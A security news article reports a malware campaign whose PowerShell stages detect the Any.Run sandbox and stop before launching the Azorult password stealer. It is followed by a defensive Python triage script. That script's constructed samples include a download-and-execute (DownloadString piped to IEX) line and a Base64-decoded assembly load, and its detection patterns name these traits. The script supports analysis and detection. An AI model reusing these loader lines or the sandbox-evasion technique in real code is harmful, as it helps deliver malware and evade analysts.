
Malware campaign attempts to evade analysis with Any.Run sandbox


Malware authors are implementing the capability to check if their malicious code is running in the Any.Run malware analysis service.

Vxers are implementing the capability to check if their malware is running in the Any.Run interactive online malware sandbox to prevent them from being analyzed by experts.

Every time malware is uploaded to the platform, the service will create a Windows virtual machine with an interactive remote desktop, and execute the file within this environment.

Any.Run allows analysts to determine the malware behavior by recording any associated activity on files, registries, and network connections.

According to Bleeping Computer, a new malware campaign first spotted by the malware researcher JAMESWT employed a technique to detect the execution in an Any.Run VM.

JAMESWT uncovered a malware campaign that uses malicious PowerShell scripts to download and install malware onto the victims’ computers.

The threat actors behind the campaign execute a script to download two PowerShell scripts that contain obfuscated and embedded malware.

The script will decode the embedded malware and execute it on the target computer.

The second script is then executed and attempts to launch a version of the Azorult password-stealing Trojan, but if it detects that the program is running on Any.Run it displays the message ‘Any.run Detected!’ and halts execution.

This will cause the malware to not be executed so that the sandbox cannot analyze it.

“When the second script is run, it will attempt to launch what appears to be the Azorult password-stealing Trojan. If it detects that the program is running on Any.Run, it will display the message ‘Any.run Detected!’ and exit. This will cause the malware to not be executed so that the sandbox cannot analyze it,” states BleepingComputer.

In this way, the threat actors attempt to prevent their malware from being analyzed by the popular sandbox service.

Experts noticed that the Trojan executes normally when installed on a live system or within any other virtual machine.
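As an added defensive example (not code from the article, from JAMESWT or from BleepingComputer), the following Python triage script scans PowerShell stages for the traits described above: a download-and-execute loader, an embedded payload decoded from Base64, and the ‘Any.run Detected!’ halt message. The sample scripts, the URL and the Base64 blob are constructed placeholders, and the rule names are my own.

```python
import re

# Constructed sample stages modelled on the campaign described above.
# They are illustrative text only, not the real scripts.
STAGE_1 = r'''
$u = "http://example.invalid/s2.ps1"   # placeholder URL
(New-Object Net.WebClient).DownloadString($u) | IEX
'''
STAGE_2 = r'''
$blob = "TVqQAAMAAAAEAAAA"             # placeholder, not a real payload
$bytes = [Convert]::FromBase64String($blob)
if ($sandboxCheck) { Write-Host 'Any.run Detected!'; exit }   # check elided
[System.Reflection.Assembly]::Load($bytes) | Out-Null
'''
BENIGN = r'''
Get-ChildItem C:\Logs | Where-Object { $_.Length -gt 1MB }
'''

DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I)
EXECUTE = re.compile(r"\bIEX\b|Invoke-Expression|Start-Process", re.I)

# Each rule is (name, predicate over the script text); order is the report order.
RULES = [
    ("download_and_execute",
     lambda s: bool(DOWNLOAD.search(s) and EXECUTE.search(s))),
    ("embedded_payload_decode",
     lambda s: bool(re.search(r"FromBase64String|-EncodedCommand", s, re.I))),
    ("sandbox_reference",
     lambda s: bool(re.search(r"any\.?run", s, re.I))),
    ("sandbox_halt_message",
     lambda s: bool(re.search(r"any\.?run\s+detected", s, re.I))),
]


def scan_script(text: str) -> list[str]:
    """Return the names of the rules that fire on one PowerShell stage."""
    return [name for name, hit in RULES if hit(text)]


def triage(scripts: dict[str, str]) -> dict[str, tuple[str, list[str]]]:
    """Map each stage name to (verdict, hits). A stage that both decodes an
    embedded payload and carries the sandbox halt message is the evasive
    loader described in the article; any other hit is merely suspicious."""
    out = {}
    for name, text in scripts.items():
        hits = scan_script(text)
        if "sandbox_halt_message" in hits and "embedded_payload_decode" in hits:
            verdict = "evasive-loader"
        elif hits:
            verdict = "suspicious"
        else:
            verdict = "clean"
        out[name] = (verdict, hits)
    return out
```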


Pierluigi Paganini

(SecurityAffairs – hacking, Any.Run)
